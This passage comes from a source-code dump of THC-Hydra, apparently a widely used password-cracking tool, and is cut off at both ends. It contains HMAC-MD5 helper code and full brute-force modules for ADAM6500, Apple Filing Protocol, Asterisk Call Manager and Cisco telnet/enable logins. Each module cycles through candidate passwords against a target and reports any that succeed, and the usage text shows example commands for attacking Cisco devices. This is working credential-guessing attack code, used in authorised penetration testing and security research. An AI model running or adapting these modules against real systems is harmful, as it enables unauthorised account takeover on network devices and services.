HMACMD5Context *ctx) { MD5_Update(&ctx->ctx, (void *)text, text_len); /* then text of datagram */ }\n\n/***********************************************************************\n finish off hmac_md5 \"inner\" buffer and generate outer one.\n***********************************************************************/\nvoid hmac_md5_final(unsigned char *digest, HMACMD5Context *ctx) {\n MD5_CTX ctx_o;\n\n MD5_Final(digest, &ctx->ctx);\n\n MD5_Init(&ctx_o);\n MD5_Update(&ctx_o, ctx->k_opad, 64);\n MD5_Update(&ctx_o, digest, 16);\n MD5_Final(digest, &ctx_o);\n}\n\n/***********************************************************\n single function to calculate an HMAC MD5 digest from data.\n use the microsoft hmacmd5 init method because the key is 16 bytes.\n************************************************************/\n\nvoid hmac_md5(unsigned char key[16], unsigned char *data, int32_t data_len, unsigned char *digest) {\n HMACMD5Context ctx;\n\n hmac_md5_init_limK_to_64(key, 16, &ctx);\n if (data_len != 0) {\n hmac_md5_update(data, data_len, &ctx);\n }\n hmac_md5_final(digest, &ctx);\n}\n\n#endif\n" }, { "path": "hmacmd5.h", "content": "/*\n Unix SMB/CIFS implementation.\n Interface header: Scheduler service\n Copyright (C) Luke Kenneth Casson Leighton 1996-1999\n Copyright (C) Andrew Tridgell 1992-1999\n\n This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program; if not, write to the Free Software\n Foundation, Inc.\n\n Free Software Foundation\n 51 Franklin Street, Fifth Floor\n Boston, MA 02110-1335\n USA\n\n Telephone: +1-617-542-5942\n Fax: +1-617-542-2652\n General email: info@fsf.org\n\n*/\n\n#ifdef __sun\n#include \n#elif defined(__FreeBSD__) || defined(__IBMCPP__) || defined(_AIX)\n#include \n#else\n#include \n#endif\n#include \n#ifndef _HMAC_MD5_H\n\ntypedef struct {\n MD5_CTX ctx;\n unsigned char k_ipad[65];\n unsigned char k_opad[65];\n} HMACMD5Context;\n\n#endif /* _HMAC_MD5_H */\n\nvoid hmac_md5_init_rfc2104(const unsigned char *key, int32_t key_len, HMACMD5Context *ctx);\nvoid hmac_md5_init_limK_to_64(const unsigned char *key, int32_t key_len, HMACMD5Context *ctx);\nvoid hmac_md5_update(const unsigned char *text, int32_t text_len, HMACMD5Context *ctx);\nvoid hmac_md5_final(unsigned char *digest, HMACMD5Context *ctx);\nvoid hmac_md5(unsigned char key[16], unsigned char *data, int32_t data_len, unsigned char *digest);\n" }, { "path": "hydra-adam6500.c", "content": "#ifdef PALM\n#include \"palm/hydra-mod.h\"\n#else\n#include \"hydra-mod.h\"\n#endif\n\nextern char *HYDRA_EXIT;\n\nunsigned char adam6500_req1[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x17, 0x01, 0x10, 0x27, 0x0f, 0x00, 0x08, 0x10, 0x24, 0x30, 0x31, 0x50, 0x57, 0x30, 0x1f, 0x1f, 0x1f, 0x1f, 0x1f, 0x1f, 0x1f, 0x1f, 0x0d, 0x00};\nunsigned char adam6500_resp1[] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x10, 0x27, 0x0f, 0x00, 0x08};\nunsigned char adam6500_req2[] = {0x01, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x03, 0x27, 0x0f, 0x00, 0x7d};\nunsigned char adam6500_resp2[] = {0x01, 0x00, 0x00, 0x00, 0x00, 0xfd, 0x01, 0x03, 0xfa, 0x3f, 0x30, 0x31, 0x0d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};\n\nint32_t start_adam6500(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *pass;\n unsigned char buffer[300];\n int32_t i;\n\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n memcpy(buffer, adam6500_req1, sizeof(adam6500_req1));\n\n for (i = 0; i < 8 && i < strlen(pass); i++)\n buffer[19 + i] = pass[i] ^ 0x3f;\n\n if (hydra_send(s, buffer, sizeof(adam6500_req1), 0) < 0)\n return 1;\n\n if (recv(s, buffer, sizeof(buffer), 0) == 12 && memcmp(buffer, adam6500_resp1, sizeof(adam6500_resp1)) == 0) {\n if (hydra_send(s, adam6500_req2, sizeof(adam6500_req2), 0) < 0)\n return 1;\n if (recv(s, buffer, sizeof(buffer), 0) == 259 && memcmp(buffer, adam6500_resp2, sizeof(adam6500_resp2)) == 0) {\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n }\n\n hydra_report_found_host(port, ip, \"adam6500\", fp);\n hydra_completed_pair_found();\n\n return 1;\n}\n\nvoid service_adam6500(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_ADAM6500, mysslport = PORT_ADAM6500_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* connect and service init function */\n {\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n next_run = 2;\n break;\n }\n case 2: /* run the cracking function */\n next_run = start_adam6500(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n#ifdef PALM\n return;\n#else\n hydra_child_exit(2);\n#endif\n }\n run = next_run;\n }\n}\n\nint32_t service_adam6500_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-afp.c", "content": "/*\n *\tApple Filing Protocol Support - by David Maciejak @ GMAIL dot com\n *\n *\ttested with afpfs-ng 0.8.1\n *\tAFPFS-NG: http://alexthepuffin.googlepages.com/home\n *\n */\n\n#include \"hydra-mod.h\"\n\n#ifndef LIBAFP\nvoid dummy_afp() { printf(\"\\n\"); }\n#else\n\n#define FREE(x) \\\n if (x != NULL) { \\\n free(x); \\\n x = NULL; \\\n }\n\n#include \n#include \n#include \n\nextern char *HYDRA_EXIT;\n\nvoid stdout_fct(void *priv, enum loglevels loglevel, int32_t logtype, const char *message) {\n // fprintf(stderr, \"[ERROR] Caught unknown error %s\\n\", message);\n}\n\nstatic struct libafpclient afpclient = {\n .unmount_volume = NULL,\n .log_for_client = stdout_fct,\n .forced_ending_hook = NULL,\n .scan_extra_fds = NULL,\n .loop_started = NULL,\n};\n\nstatic int32_t server_subconnect(struct afp_url url) {\n struct afp_connection_request *conn_req;\n struct afp_server *server = NULL;\n\n conn_req = malloc(sizeof(struct afp_connection_request));\n // server = malloc(sizeof(struct afp_server));\n\n memset(conn_req, 0, sizeof(struct afp_connection_request));\n\n conn_req->url = url;\n conn_req->url.requested_version = 31;\n\n // fprintf(stderr, \"AFP connection - username: %s password: %s server: %s\\n\",\n // url.username, url.password, url.servername);\n\n if (strlen(url.uamname) > 0) {\n if ((conn_req->uam_mask = find_uam_by_name(url.uamname)) == 0) {\n fprintf(stderr, \"[ERROR] Unknown UAM: %s\\n\", url.uamname);\n FREE(conn_req);\n FREE(server);\n return -1;\n }\n } else {\n conn_req->uam_mask = default_uams_mask();\n }\n\n // fprintf(stderr, \"Initiating connection attempt.\\n\");\n if ((server = afp_server_full_connect(NULL, conn_req)) == NULL) {\n FREE(conn_req);\n // FREE(server);\n return -1;\n }\n // fprintf(stderr, \"Connected to server: %s via UAM: %s\\n\",\n // server->server_name_printable, uam_bitmap_to_string(server->using_uam));\n\n FREE(conn_req);\n FREE(server);\n\n return 0;\n}\n\nint32_t start_afp(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *login, *pass, mlogin[AFP_MAX_USERNAME_LEN], mpass[AFP_MAX_PASSWORD_LEN];\n struct afp_url tmpurl;\n\n /* Build AFP authentication request */\n libafpclient_register(&afpclient);\n afp_main_quick_startup(NULL);\n init_uams();\n afp_default_url(&tmpurl);\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n strncpy(tmpurl.servername, hydra_address2string(ip), AFP_SERVER_NAME_LEN - 1);\n tmpurl.servername[AFP_SERVER_NAME_LEN] = 0;\n strncpy(mlogin, login, AFP_MAX_USERNAME_LEN - 1);\n mlogin[AFP_MAX_USERNAME_LEN - 1] = 0;\n strncpy(mpass, pass, AFP_MAX_PASSWORD_LEN - 1);\n mpass[AFP_MAX_PASSWORD_LEN - 1] = 0;\n memcpy(&tmpurl.username, mlogin, AFP_MAX_USERNAME_LEN);\n memcpy(&tmpurl.password, mpass, AFP_MAX_PASSWORD_LEN);\n\n if (server_subconnect(tmpurl) == 0) {\n hydra_report_found_host(port, ip, \"afp\", fp);\n hydra_completed_pair_found();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n } else {\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 2;\n }\n return 1;\n}\n\nvoid service_afp(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_AFP;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n }\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n next_run = 2;\n break;\n\n case 2:\n\n /*\n * Here we start the password cracking process\n */\n\n next_run = start_afp(sock, ip, port, options, miscptr, fp);\n break;\n case 3:\n\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n\n default:\n\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n }\n run = next_run;\n }\n}\n\n#endif\n\nint32_t service_afp_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-asterisk.c", "content": "// This plugin was written by david@\n//\n// This plugin is written for Asterisk Call Manager\n// which is running by default on TCP/5038\n//\n\n#include \"hydra-mod.h\"\n\nextern char *HYDRA_EXIT;\n\nchar *buf;\n\nint32_t start_asterisk(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\\\"\\\"\";\n char *login, *pass, buffer[1024];\n\n if (strlen(login = hydra_get_next_login()) == 0)\n login = empty;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n while (hydra_data_ready(s) > 0) {\n if ((buf = hydra_receive_line(s)) == NULL)\n return (1);\n free(buf);\n }\n memset(buffer, 0, sizeof(buffer));\n sprintf(buffer, \"Action: Login\\r\\nUsername: %.250s\\r\\nSecret: %.250s\\r\\n\\r\\n\", login, pass);\n\n if (debug)\n hydra_report(stderr, \"[DEBUG] C: %s\\n\", buffer);\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n if ((buf = hydra_receive_line(s)) == NULL)\n return 1;\n\n if (debug)\n hydra_report(stderr, \"[DEBUG] S: %s\\n\", buf);\n\n if (buf == NULL || (strstr(buf, \"Response: \") == NULL)) {\n hydra_report(stderr,\n \"[ERROR] Asterisk Call Manager protocol error or service \"\n \"shutdown: %s\\n\",\n buf);\n free(buf);\n return 4;\n }\n\n if (strstr(buf, \"Response: Success\") != NULL) {\n hydra_report_found_host(port, ip, \"asterisk\", fp);\n hydra_completed_pair_found();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n\n return 2;\n}\n\nvoid service_asterisk(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_ASTERISK, mysslport = PORT_ASTERISK_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n switch (run) {\n case 1: /* connect and service init function */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(300);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n\n if (sock < 0) {\n if (verbose || debug)\n hydra_report(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n buf = hydra_receive_line(sock);\n // fprintf(stderr, \"%s\\n\",buf);\n // banner should look like:\n // Asterisk Call Manager/1.1\n\n if (buf == NULL || strstr(buf, \"Asterisk Call Manager/\") == NULL) {\n /* check the first line */\n if (verbose || debug)\n hydra_report(stderr,\n \"[ERROR] Not an Asterisk Call Manager protocol or \"\n \"service shutdown: %s\\n\",\n buf);\n hydra_child_exit(2);\n }\n free(buf);\n\n next_run = 2;\n break;\n case 2: /* run the cracking function */\n next_run = start_asterisk(sock, ip, port, options, miscptr, fp);\n break;\n case 3: /* clean exit */\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n break;\n default:\n hydra_report(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_asterisk_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n" }, { "path": "hydra-cisco-enable.c", "content": "#include \"hydra-mod.h\"\n\nextern char *HYDRA_EXIT;\nchar *buf;\n\nint32_t start_cisco_enable(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *pass, buffer[300];\n\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n sprintf(buffer, \"%.250s\\r\\n\", pass);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n buf = hydra_receive_line(s);\n if (buf != NULL && strstr(buf, \"assw\") != NULL) {\n hydra_completed_pair();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n sprintf(buffer, \"%.250s\\r\\n\", pass);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n buf = hydra_receive_line(s);\n if (strstr(buf, \"assw\") != NULL) {\n hydra_completed_pair();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n sprintf(buffer, \"%.250s\\r\\n\", pass);\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n buf = hydra_receive_line(s);\n }\n }\n\n if (buf != NULL && (strstr(buf, \"assw\") != NULL || strstr(buf, \"ad \") != NULL || strstr(buf, \"attempt\") != NULL || strstr(buf, \"fail\") != NULL || strstr(buf, \"denied\") != NULL)) {\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 2;\n }\n\n if (buf != NULL)\n free(buf);\n hydra_report_found_host(port, ip, \"cisco-enable\", fp);\n hydra_completed_pair_found();\n return 3;\n}\n\nvoid service_cisco_enable(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, failc = 0, retry = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_TELNET, mysslport = PORT_TELNET_SSL;\n char buffer[300];\n char *login;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* connect and service init function */\n {\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n } else {\n if (port != 0)\n mysslport = port;\n sock = hydra_connect_ssl(ip, mysslport, hostname);\n port = mysslport;\n }\n if (sock < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not connect\\n\", (int32_t)getpid());\n hydra_child_exit(1);\n }\n\n /* Cisco AAA Support */\n if (strlen(login = hydra_get_next_login()) != 0) {\n while ((buf = hydra_receive_line(sock)) != NULL && strstr(buf, \"name:\") == NULL && strstr(buf, \"ogin:\") == NULL) {\n if (hydra_strcasestr(buf, \"ress ENTER\") != NULL)\n hydra_send(sock, \"\\r\\n\", 2, 0);\n free(buf);\n }\n\n sprintf(buffer, \"%.250s\\r\\n\", login);\n if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not send login\\n\", (int32_t)getpid());\n hydra_child_exit(2);\n }\n }\n\n if (miscptr != NULL) {\n if (buf != NULL)\n free(buf);\n while ((buf = hydra_receive_line(sock)) != NULL && strstr(buf, \"assw\") == NULL) {\n if (hydra_strcasestr(buf, \"ress ENTER\") != NULL)\n hydra_send(sock, \"\\r\\n\", 2, 0);\n free(buf);\n }\n\n sprintf(buffer, \"%.250s\\r\\n\", miscptr);\n if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not send login\\n\", (int32_t)getpid());\n hydra_child_exit(2);\n }\n }\n\n if (buf != NULL)\n free(buf);\n buf = hydra_receive_line(sock);\n if (hydra_strcasestr(buf, \"ress ENTER\") != NULL) {\n hydra_send(sock, \"\\r\\n\", 2, 0);\n free(buf);\n buf = hydra_receive_line(sock);\n }\n\n if (strstr(buf, \"assw\") != NULL) {\n if (quiet != 1)\n fprintf(stderr,\n \"[ERROR] Child with pid %d terminating - can not login, can \"\n \"not login\\n\",\n (int32_t)getpid());\n hydra_child_exit(2);\n }\n free(buf);\n\n next_run = 2;\n break;\n }\n case 2: /* run the cracking function */\n {\n unsigned char *buf2;\n int32_t f = 0;\n\n sprintf(buffer, \"%.250s\\r\\n\", \"ena\");\n if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not send 'ena'\\n\", (int32_t)getpid());\n hydra_child_exit(2);\n }\n\n do {\n if (f != 0)\n free(buf2);\n else\n f = 1;\n if ((buf2 = (unsigned char *)hydra_receive_line(sock)) == NULL) {\n if (failc < retry) {\n next_run = 1;\n failc++;\n if (quiet != 1)\n fprintf(stderr,\n \"[ERROR] Child with pid %d was disconnected - retrying \"\n \"(%d of %d retries)\\n\",\n (int32_t)getpid(), failc, retry);\n sleep(3);\n break;\n } else {\n fprintf(stderr, \"[ERROR] Child with pid %d was disconnected - exiting\\n\", (int32_t)getpid());\n hydra_child_exit(0);\n }\n }\n } while (strstr((char *)buf2, \"assw\") == NULL);\n free(buf2);\n if (next_run != 0)\n break;\n failc = 0;\n\n next_run = start_cisco_enable(sock, ip, port, options, miscptr, fp);\n break;\n }\n case 3: /* clean exit */\n sprintf(buffer, \"%.250s\\r\\n\", \"exit\");\n if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {\n if (quiet != 1)\n fprintf(stderr, \"[ERROR] Child with pid %d terminating, can not send 'exit'\\n\", (int32_t)getpid());\n hydra_child_exit(0);\n }\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n hydra_child_exit(0);\n return;\n default:\n fprintf(stderr, \"[ERROR] Caught unknown return code, exiting!\\n\");\n hydra_child_exit(0);\n hydra_child_exit(2);\n }\n run = next_run;\n }\n}\n\nint32_t service_cisco_enable_init(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n // called before the childrens are forked off, so this is the function\n // which should be filled if initial connections and service setup has to be\n // performed once only.\n //\n // fill if needed.\n //\n // return codes:\n // 0 all OK\n // -1 error, hydra will exit, so print a good error message here\n\n return 0;\n}\n\nvoid usage_cisco_enable(const char *service) {\n printf(\"Module cisco-enable is optionally taking the logon password for the \"\n \"cisco device\\n\"\n \"Note: if AAA authentication is used, use the -l option for the \"\n \"username\\n\"\n \"and the optional parameter for the password of the user.\\n\"\n \"Examples:\\n\"\n \" hydra -P pass.txt target cisco-enable (direct console access)\\n\"\n \" hydra -P pass.txt -m cisco target cisco-enable (Logon password \"\n \"cisco)\\n\"\n \" hydra -l foo -m bar -P pass.txt target cisco-enable (AAA Login \"\n \"foo, password bar)\\n\");\n}\n" }, { "path": "hydra-cisco.c", "content": "#ifdef PALM\n#include \"palm/hydra-mod.h\"\n#else\n#include \"hydra-mod.h\"\n#endif\n\nextern char *HYDRA_EXIT;\nstatic char *buf = NULL;\n\nint32_t start_cisco(int32_t s, char *ip, int32_t port, unsigned char options, char *miscptr, FILE *fp) {\n char *empty = \"\";\n char *pass, buffer[300];\n\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n#ifdef PALM\n sprintf(buffer, \"%s\\r\\n\", pass);\n#else\n sprintf(buffer, \"%.250s\\r\\n\", pass);\n#endif\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n sleep(1);\n buf = NULL;\n do {\n if (buf != NULL)\n free(buf);\n if ((buf = hydra_receive_line(s)) == NULL)\n return 3;\n if (buf[strlen(buf) - 1] == '\\n')\n buf[strlen(buf) - 1] = 0;\n if (buf[strlen(buf) - 1] == '\\r')\n buf[strlen(buf) - 1] = 0;\n } while (strlen(buf) <= 1);\n if (strstr(buf, \"assw\") != NULL) {\n hydra_completed_pair();\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n#ifdef PALM\n sprintf(buffer, \"%s\\r\\n\", pass);\n#else\n sprintf(buffer, \"%.250s\\r\\n\", pass);\n#endif\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n\n buf = NULL;\n do {\n if (buf != NULL)\n free(buf);\n if ((buf = hydra_receive_line(s)) == NULL)\n return 3;\n if (buf[strlen(buf) - 1] == '\\n')\n buf[strlen(buf) - 1] = 0;\n if (buf[strlen(buf) - 1] == '\\r')\n buf[strlen(buf) - 1] = 0;\n } while (strlen(buf) <= 1);\n if (buf != NULL && strstr(buf, \"assw\") != NULL) {\n hydra_completed_pair();\n free(buf);\n buf = NULL;\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n if (strlen(pass = hydra_get_next_password()) == 0)\n pass = empty;\n\n#ifdef PALM\n sprintf(buffer, \"%s\\r\\n\", pass);\n#else\n sprintf(buffer, \"%.250s\\r\\n\", pass);\n#endif\n\n if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {\n return 1;\n }\n buf = NULL;\n do {\n if (buf != NULL)\n free(buf);\n buf = hydra_receive_line(s);\n if (buf != NULL) {\n if (buf[strlen(buf) - 1] == '\\n')\n buf[strlen(buf) - 1] = 0;\n if (buf[strlen(buf) - 1] == '\\r')\n buf[strlen(buf) - 1] = 0;\n }\n } while (buf != NULL && strlen(buf) <= 1);\n }\n }\n\n if (buf != NULL && (strstr(buf, \"assw\") != NULL || strstr(buf, \"ad \") != NULL || strstr(buf, \"attempt\") != NULL || strstr(buf, \"ailur\") != NULL)) {\n free(buf);\n hydra_completed_pair();\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n }\n\n hydra_report_found_host(port, ip, \"cisco\", fp);\n hydra_completed_pair_found();\n if (buf != NULL)\n free(buf);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return 3;\n return 1;\n}\n\nvoid service_cisco(char *ip, int32_t sp, unsigned char options, char *miscptr, FILE *fp, int32_t port, char *hostname) {\n int32_t run = 1, failc = 0, retry = 1, next_run = 1, sock = -1;\n int32_t myport = PORT_TELNET, mysslport = PORT_TELNET_SSL;\n\n hydra_register_socket(sp);\n if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)\n return;\n while (1) {\n next_run = 0;\n switch (run) {\n case 1: /* connect and service init function */\n {\n unsigned char *buf2 = NULL;\n int32_t f = 0;\n\n if (sock >= 0)\n sock = hydra_disconnect(sock);\n // usleepn(275);\n if ((options & OPTION_SSL) == 0) {\n if (port != 0)\n myport = port;\n sock = hydra_connect_tcp(ip, myport);\n port = myport;\n if (miscptr != NULL && hydra_strcasestr(miscptr, \"enter\") != NULL)\n hydra_send(sock, \"\\r\\n\", 2, 0);\n } else {\n if (port != 0)\n mysslport = port;\n sock = 